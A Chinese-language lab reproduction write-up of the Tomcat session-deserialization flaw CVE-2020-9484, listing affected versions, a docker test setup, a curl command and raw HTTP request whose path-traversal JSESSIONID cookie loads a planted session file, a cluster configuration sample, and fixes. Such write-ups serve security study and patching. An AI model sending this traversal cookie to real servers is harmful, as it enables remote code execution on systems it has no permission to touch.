当前位置: 代码迷 >> 综合 >> CVE-2020-9484 (Tomcat cluster sync-session)复现
  详细解决方案

CVE-2020-9484 (Tomcat cluster sync-session)复现

热度:49   发布时间:2023-11-20 05:06:22.0

图片

CVE-2020-9484

一、漏洞简介

对于一个企业级应用而言,Session对象的管理十分重要。Session对象的信息一般情况下置于服务器的内存中,当服务器由于故障重启,或应用重新加载 时候,此时的Session信息将全部丢失。为了避免这样的情况,在某些场合可以将服务器的Session数据存放在文件系统或数据库中,这样的操作称为 Session对象的持久化。Session对象在持久化时,存放在其中的对象以序列化的形式存放,这就是为什么一般存放在Session中的数据需要实 现可序列化接口(java.io.Serializable)的原因了。

当一个Session开始时,Servlet容器会为Session创建一个HttpSession对象。Servlet容器在某些情况下把这些 HttpSession对象从内存中转移到文件系统或数据库中,在需要访问 HttpSession信息时再把它们加载到内存中。(tomcat使用了自带session同步功能时,不安全的配置(没有使用EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包, 可以对使用了tomcat自带session同步功能的服务器进行攻击。)

二、影响版本和不影响版本

受影响产品版本

Apache Tomcat 10.x < 10.0.0-M5

Apache Tomcat 9.x < 9.0.35

Apache Tomcat 8.x < 8.5.55

Apache Tomcat 7.x < 7.0.104

不受影响产品版本

Apache Tomcat 10.x >= 10.0.0-M5

Apache Tomcat 9.x >= 9.0.35

Apache Tomcat 8.x >= 8.5.55

Apache Tomcat 7.x >= 7.0.104

三、漏洞复现

实验环境:后台回复“CVE-2020-9484”获取环境或者git clone https://github.com/masahiro331/CVE-2020-9484.git

$ git clone https://github.com/masahiro331/CVE-2020-9484.git
$ cd CVE-2020-9484
$ docker build -t tomcat:groovy .
$ docker run -d -p 8080:8080 tomcat:groovy

拉取docker镜像

图片

两个tomcat模拟集群

图片

开始服务 docker run -d -p 8080:8080 tomcat:groovy

图片

访问http://192.168.0.102:8080/

图片

查看/tmp下面的文件

图片

漏洞执行POC通过JSESSION加载恶意的session持久化文件

curl 'http://192.168.0.102:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

或者抓包执行

GET /index.jsp HTTP/1.1
Host: 192.168.0.102:8080
Cookie: JSESSIONID=JSESSIONID=../../../../../usr/local/tomcat/groovy

执行图片

图片

查看/tmp下面的文件

图片

### tomcat-session同步配置

<Server>...<Service>...<Engine>...<Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"channelSendOptions="6"><Manager className="org.apache.catalina.ha.session.BackupManager"expireSessionsOnShutdown="false"notifyListenersOnReplication="true"mapSendOptions="6"/><Channel className="org.apache.catalina.tribes.group.GroupChannel"><Membership className="org.apache.catalina.tribes.membership.McastService"address="228.0.0.4"port="45564"frequency="500"dropTime="3000"/><Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"address="123.123.123.123"port="5000"selectorTimeout="100"maxThreads="6"/><Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter"><Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/></Sender></Channel><Valve className="org.apache.catalina.ha.tcp.ReplicationValve"filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/><Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"tempDir="/tmp/war-temp/"deployDir="/tmp/war-deploy/"watchDir="/tmp/war-listen/"watchEnabled="false"/><ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/></Cluster></Engine></Service>
</Server>

四、修复方案

1)升级tomcat至最新版本

2)关闭session持久化

3)检查项目中是否存在文件名和后缀均可控的上传点

参考:

https://github.com/masahiro331/CVE-2020-9484

https://mp.weixin.qq.com/s/mHwBEHhm6_IoxHfWb9UY-A

https://www.cnblogs.com/potatsoSec/p/12931427.html

实验环境:后台回复“CVE-2020-9484”获取环境

或者git clone https://github.com/masahiro331/CVE-2020-9484.git

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

图片

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.